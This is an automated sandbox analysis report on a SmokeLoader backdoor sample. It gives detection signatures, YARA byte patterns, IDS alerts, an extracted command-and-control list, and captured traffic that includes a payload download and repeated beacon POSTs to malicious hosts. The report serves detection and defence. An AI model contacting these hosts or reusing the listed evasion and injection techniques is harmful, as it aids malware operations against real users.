Edit tour

Windows Analysis Report
mGFoU1INUk.exe

Overview

General Information

Sample name:	mGFoU1INUk.exe renamed because original name is a hash value
Original sample name:	18daa2c6a6f6385895582d4e9954d851.exe
Analysis ID:	1532225
MD5:	18daa2c6a6f6385895582d4e9954d851
SHA1:	88f22a473df849c91e70a91a8376abff2b5b108f
SHA256:	346085fe3603fbc085f801241cccdc4d3765929a6cd5f9906cbcfcd6657065a3
Tags:	exeSocks5Systemzuser-abuse_ch
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected SmokeLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to read the PEB

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

PE file overlay found

Sigma detected: Execution of Suspicious File Type Extension

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

mGFoU1INUk.exe (PID: 1976 cmdline: "C:\Users\user\Desktop\mGFoU1INUk.exe" MD5: 18DAA2C6A6F6385895582D4E9954D851)

explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

ibjgueh (PID: 5960 cmdline: C:\Users\user\AppData\Roaming\ibjgueh MD5: 18DAA2C6A6F6385895582D4E9954D851)

ibjgueh (PID: 2604 cmdline: C:\Users\user\AppData\Roaming\ibjgueh MD5: 18DAA2C6A6F6385895582D4E9954D851)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.2419877592.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000004.00000002.2419910079.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.2419910079.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.2420146039.0000000002F01000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.2420146039.0000000002F01000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.2147151739.0000000002C47000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3561:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.2420034001.0000000002D07000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x39e1:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2148008408.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2148008408.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.2147911658.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2147911658.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.2147438487.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\ibjgueh, CommandLine: C:\Users\user\AppData\Roaming\ibjgueh, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ibjgueh, NewProcessName: C:\Users\user\AppData\Roaming\ibjgueh, OriginalFileName: C:\Users\user\AppData\Roaming\ibjgueh, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\ibjgueh, ProcessId: 5960, ProcessName: ibjgueh

Suricata Signatures

ET MALWARE Suspected Smokeloader Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T20:07:29.848902+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49792	119.204.11.2	80	TCP
2024-10-12T20:07:31.374913+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49799	119.204.11.2	80	TCP
2024-10-12T20:07:32.891080+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49809	119.204.11.2	80	TCP
2024-10-12T20:07:34.426343+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49820	119.204.11.2	80	TCP
2024-10-12T20:07:35.946752+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49831	119.204.11.2	80	TCP
2024-10-12T20:07:37.459108+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49841	119.204.11.2	80	TCP
2024-10-12T20:07:38.958859+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49849	119.204.11.2	80	TCP
2024-10-12T20:07:40.481991+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49861	119.204.11.2	80	TCP
2024-10-12T20:07:41.972367+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49870	119.204.11.2	80	TCP
2024-10-12T20:07:43.476100+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49881	119.204.11.2	80	TCP
2024-10-12T20:07:44.967534+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49892	119.204.11.2	80	TCP
2024-10-12T20:07:46.457451+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49903	119.204.11.2	80	TCP
2024-10-12T20:07:47.959801+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49914	119.204.11.2	80	TCP
2024-10-12T20:07:49.466916+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49925	119.204.11.2	80	TCP
2024-10-12T20:07:50.949811+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49932	119.204.11.2	80	TCP
2024-10-12T20:07:52.436567+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49943	119.204.11.2	80	TCP
2024-10-12T20:07:53.920305+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49954	119.204.11.2	80	TCP
2024-10-12T20:07:55.414257+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49964	119.204.11.2	80	TCP
2024-10-12T20:07:56.903613+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49972	119.204.11.2	80	TCP
2024-10-12T20:07:58.598972+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49983	119.204.11.2	80	TCP
2024-10-12T20:08:00.089880+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49993	119.204.11.2	80	TCP
2024-10-12T20:08:01.634818+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49998	119.204.11.2	80	TCP
2024-10-12T20:08:03.281168+0200	2039103	1	A Network Trojan was detected	192.168.2.5	49999	119.204.11.2	80	TCP
2024-10-12T20:08:04.804921+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50000	119.204.11.2	80	TCP
2024-10-12T20:08:08.140704+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50002	119.204.11.2	80	TCP
2024-10-12T20:08:09.781553+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50003	119.204.11.2	80	TCP
2024-10-12T20:08:11.264790+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50004	119.204.11.2	80	TCP
2024-10-12T20:08:12.807847+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50005	119.204.11.2	80	TCP
2024-10-12T20:08:15.107333+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50006	119.204.11.2	80	TCP
2024-10-12T20:08:16.639263+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50007	119.204.11.2	80	TCP
2024-10-12T20:08:18.120800+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50008	119.204.11.2	80	TCP
2024-10-12T20:08:19.640221+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50009	119.204.11.2	80	TCP
2024-10-12T20:08:21.135939+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50010	119.204.11.2	80	TCP
2024-10-12T20:08:22.613113+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50011	119.204.11.2	80	TCP
2024-10-12T20:08:23.941825+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50012	119.204.11.2	80	TCP
2024-10-12T20:08:25.476955+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50013	119.204.11.2	80	TCP
2024-10-12T20:09:34.491548+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50014	119.204.11.2	80	TCP
2024-10-12T20:09:39.836652+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50015	119.204.11.2	80	TCP
2024-10-12T20:09:45.207552+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50016	119.204.11.2	80	TCP
2024-10-12T20:09:51.304176+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50017	119.204.11.2	80	TCP
2024-10-12T20:09:57.203146+0200	2039103	1	A Network Trojan was detected	192.168.2.5	50018	119.204.11.2	80	TCP
2024-10-12T20:10:07.063551+0200	2039103	1	A Network Trojan was detected	192.168.2.5	60089	175.119.10.231	80	TCP
2024-10-12T20:10:11.870177+0200	2039103	1	A Network Trojan was detected	192.168.2.5	60090	175.119.10.231	80	TCP
2024-10-12T20:10:17.910339+0200	2039103	1	A Network Trojan was detected	192.168.2.5	60091	175.119.10.231	80	TCP
2024-10-12T20:10:23.702222+0200	2039103	1	A Network Trojan was detected	192.168.2.5	60092	175.119.10.231	80	TCP
2024-10-12T20:10:30.353244+0200	2039103	1	A Network Trojan was detected	192.168.2.5	60093	175.119.10.231	80	TCP
2024-10-12T20:10:36.229845+0200	2039103	1	A Network Trojan was detected	192.168.2.5	60094	175.119.10.231	80	TCP
2024-10-12T20:10:41.630767+0200	2039103	1	A Network Trojan was detected	192.168.2.5	60095	175.119.10.231	80	TCP
2024-10-12T20:10:46.361537+0200	2039103	1	A Network Trojan was detected	192.168.2.5	60096	175.119.10.231	80	TCP
2024-10-12T20:10:51.684157+0200	2039103	1	A Network Trojan was detected	192.168.2.5	60097	175.119.10.231	80	TCP
2024-10-12T20:10:56.903490+0200	2039103	1	A Network Trojan was detected	192.168.2.5	60098	175.119.10.231	80	TCP
2024-10-12T20:11:04.022959+0200	2039103	1	A Network Trojan was detected	192.168.2.5	60099	175.119.10.231	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.2419910079.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Multi AV Scanner detection for domain / URL

Source: nwgrus.ru	Virustotal: Detection: 12%			Perma Link
Source: http://nwgrus.ru/tmp/index.php	Virustotal: Detection: 16%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\ibjgueh	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Roaming\ibjgueh	Virustotal: Detection: 36%			Perma Link

Multi AV Scanner detection for submitted file

Source: mGFoU1INUk.exe	ReversingLabs: Detection: 36%
Source: mGFoU1INUk.exe	Virustotal: Detection: 36%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\ibjgueh	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B995.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: mGFoU1INUk.exe

Joe Sandbox ML: detected

Source: mGFoU1INUk.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\mGFoU1INUk.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.5:50001 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49799 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49831 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49820 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49849 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49861 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49792 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49841 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49881 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49870 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49932 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49925 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49954 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49983 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49964 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50000 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49903 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50015 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50008 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49892 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50017 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:60097 -> 175.119.10.231:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:60089 -> 175.119.10.231:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50002 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50018 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50006 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50012 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:60094 -> 175.119.10.231:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50010 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:60098 -> 175.119.10.231:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:60093 -> 175.119.10.231:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49943 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50016 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50003 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49993 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50009 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50014 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:60099 -> 175.119.10.231:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:60096 -> 175.119.10.231:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49914 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49809 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:60090 -> 175.119.10.231:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50005 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50007 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50013 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49972 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:60095 -> 175.119.10.231:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49999 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49998 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50004 -> 119.204.11.2:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:60092 -> 175.119.10.231:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:60091 -> 175.119.10.231:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50011 -> 119.204.11.2:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 175.119.10.231 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.164 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 119.204.11.2 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://nwgrus.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://tech-servers.in.net/tmp/index.php
Source: Malware configuration extractor	URLs: http://unicea.ws/tmp/index.php

Source: Joe Sandbox View	IP Address: 23.145.40.164 23.145.40.164
Source: Joe Sandbox View	IP Address: 175.119.10.231 175.119.10.231

Source: Joe Sandbox View	ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
Source: Joe Sandbox View	ASN Name: KIXS-AS-KRKoreaTelecomKR KIXS-AS-KRKoreaTelecomKR
Source: Joe Sandbox View	ASN Name: SKB-ASSKBroadbandCoLtdKR SKB-ASSKBroadbandCoLtdKR

Source: Joe Sandbox View

JA3 fingerprint: 72a589da586844d7f0818ce684948eea

Source: global traffic	HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yilmrbbiqbh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://saaiglxgesx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wmicpxlifessw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vbthucuxeraia.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fhouqknummbbf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://onlnloemqmkdhio.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xrccmhuqkqkddsnr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sgoujgwybxsges.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jousimacigldf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sswxpvuufbvykyb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cdinohvnolrheurg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lifadhlvdwb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ssfieliemcmj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oigeugvvgtqexcr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 210Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rscdgmrjlxccyebn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: nwgrus.ru
